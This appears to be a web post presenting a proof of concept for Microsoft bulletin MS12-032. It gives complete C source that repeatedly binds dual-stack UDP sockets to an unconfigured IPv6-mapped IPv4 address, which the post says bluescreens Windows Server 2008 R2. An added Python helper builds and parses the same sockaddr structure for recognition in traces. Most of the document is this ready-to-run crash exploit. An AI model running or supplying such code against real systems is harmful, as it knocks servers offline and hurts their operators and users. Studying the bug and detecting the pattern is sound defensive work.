PoC for MS12-032

Microsoft has released the patch for MS12-032:

http://technet.microsoft.com/en-us/security/bulletin/ms12-032

This patch fixes a stack overflow issue related to the TCP/IP protocol that can lead to local privilege escalation; Microsoft has already asked StackOverflow.com to remove this code.

The original poster described it as follows: the program tries to bind to an IPv6-mapped IPv4 address, and so far this only gets as far as a crash.

We discovered that running our application under certain conditions results in Windows bluescreen. After some investigation we were able to narrow down the scenario to a sample of ~50 lines of C code using Winsock2 APIs. The sample repeatedly binds to IPv6-mapped invalid IPv4 address. Windows Server 2008 R2 crashes after several seconds running the sample. The problem reproduces on different physical machines as well as on Virtual Machines.

The main code is written in C, as follows:

// The program attempts to bind to an IPv6-mapped IPv4 address in a tight loop.
// If the address is not configured on the machine running the program, this
// crashes Windows Server 2008 R2 (if the program is 32-bit).
#include <winsock2.h>
#include <ws2tcpip.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdbool.h>

#pragma comment(lib, "ws2_32.lib")

#ifndef IPV6_V6ONLY
#define IPV6_V6ONLY 27
#endif

// Initialise Winsock 2.2; exit the process if that fails.
void MyWsaStartup(void)
{
    WORD wVersionRequested;
    WSADATA wsaData;
    int err;

    wVersionRequested = MAKEWORD(2, 2);

    err = WSAStartup(wVersionRequested, &wsaData);
    if (err != 0) {
        printf("WSAStartup failed with error: %d\n", err);
        exit(-1);
    }
}

int main(void)
{
    MyWsaStartup();
    bool bindSuccess = false;

    while (!bindSuccess)
    {
        // Dual-stack (AF_INET6) UDP socket
        SOCKET sock = WSASocket(AF_INET6,
                                SOCK_DGRAM,
                                IPPROTO_UDP,
                                NULL,
                                0,
                                WSA_FLAG_OVERLAPPED);
        if (sock == INVALID_SOCKET)
        {
            printf("WSASocket failed\n");
            exit(-1);
        }

        // Clear IPV6_V6ONLY so the socket also accepts IPv4-mapped addresses
        DWORD val = 0;
        if (setsockopt(sock,
                       IPPROTO_IPV6,
                       IPV6_V6ONLY,
                       (const char*)&val,
                       sizeof(val)) != 0)
        {
            printf("setsockopt failed\n");
            closesocket(sock);
            exit(-1);
        }

        struct sockaddr_in6 sockAddr;
        memset(&sockAddr, 0, sizeof(sockAddr));
        sockAddr.sin6_family = AF_INET6;
        sockAddr.sin6_port = htons(5060);

        // set address to IPv6-mapped 169.13.13.13 (not configured on the local machine)
        // that is [::FFFF:169.13.13.13]
        sockAddr.sin6_addr.u.Byte[15] = 13;
        sockAddr.sin6_addr.u.Byte[14] = 13;
        sockAddr.sin6_addr.u.Byte[13] = 13;
        sockAddr.sin6_addr.u.Byte[12] = 169;
        sockAddr.sin6_addr.u.Byte[11] = 0xFF;
        sockAddr.sin6_addr.u.Byte[10] = 0xFF;

        int size = 28; // 28 is sizeof(sockaddr_in6)

        int nRet = bind(sock, (struct sockaddr*)&sockAddr, size);
        if (nRet == SOCKET_ERROR)
        {
            // bind fails because the address is not local; retry after a short pause
            closesocket(sock);
            Sleep(100);
        }
        else
        {
            bindSuccess = true;
            printf("bind succeeded\n");
            closesocket(sock);
        }
    }

    WSACleanup();
    return 0;
}
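To see exactly what the PoC hands to bind(), and to recognise this shape of sockaddr in a trace or capture, here is an added example (not from the original post) that assembles the same 28-byte sockaddr_in6 in Python and parses it back. It assumes the Winsock layout of the 32-bit x86 build described: AF_INET6 = 23 with sin6_family in little-endian host order; the helper names are mine.

```python
import ipaddress
import struct

# Assumptions (not stated on the page): Winsock's AF_INET6 is 23 and
# sin6_family is stored in little-endian host order (32-bit x86 build).
AF_INET6 = 23
SOCKADDR_IN6_LEN = 28  # the PoC hard-codes 28 as sizeof(sockaddr_in6)


def build_sockaddr_in6(address: str, port: int) -> bytes:
    """Assemble a sockaddr_in6 the way the PoC fills it by hand: family (u16,
    host order), port (u16, network order), flowinfo (u32), 16-byte address,
    scope_id (u32). An IPv4 input is encoded as the PoC does: 0xFF at address
    bytes 10-11 and the IPv4 octets at bytes 12-15, i.e. ::FFFF:a.b.c.d."""
    ip = ipaddress.ip_address(address)
    if ip.version == 4:
        addr = bytearray(16)
        addr[10] = addr[11] = 0xFF
        addr[12:16] = ip.packed
    else:
        addr = bytearray(ip.packed)
    return (struct.pack("<H", AF_INET6)
            + struct.pack("!H", port)      # htons(port)
            + struct.pack("<I", 0)         # sin6_flowinfo
            + bytes(addr)                  # sin6_addr
            + struct.pack("<I", 0))        # sin6_scope_id


def parse_sockaddr_in6(raw: bytes) -> dict:
    """Decode a raw sockaddr_in6 and report whether its address is an
    IPv4-mapped IPv6 address, the kind of bind() target the PoC loops on."""
    if len(raw) != SOCKADDR_IN6_LEN:
        raise ValueError(f"expected {SOCKADDR_IN6_LEN} bytes, got {len(raw)}")
    (family,) = struct.unpack_from("<H", raw, 0)
    (port,) = struct.unpack_from("!H", raw, 2)
    addr = ipaddress.IPv6Address(raw[8:24])
    mapped = addr.ipv4_mapped  # None unless the address is ::FFFF:a.b.c.d
    return {
        "family": family,
        "port": port,
        "address": str(addr),
        "ipv4_mapped": str(mapped) if mapped is not None else None,
    }


if __name__ == "__main__":
    # Constructed sample: the PoC's own target [::FFFF:169.13.13.13]:5060
    raw = build_sockaddr_in6("169.13.13.13", 5060)
    print(len(raw), raw.hex())
    print(parse_sockaddr_in6(raw))
```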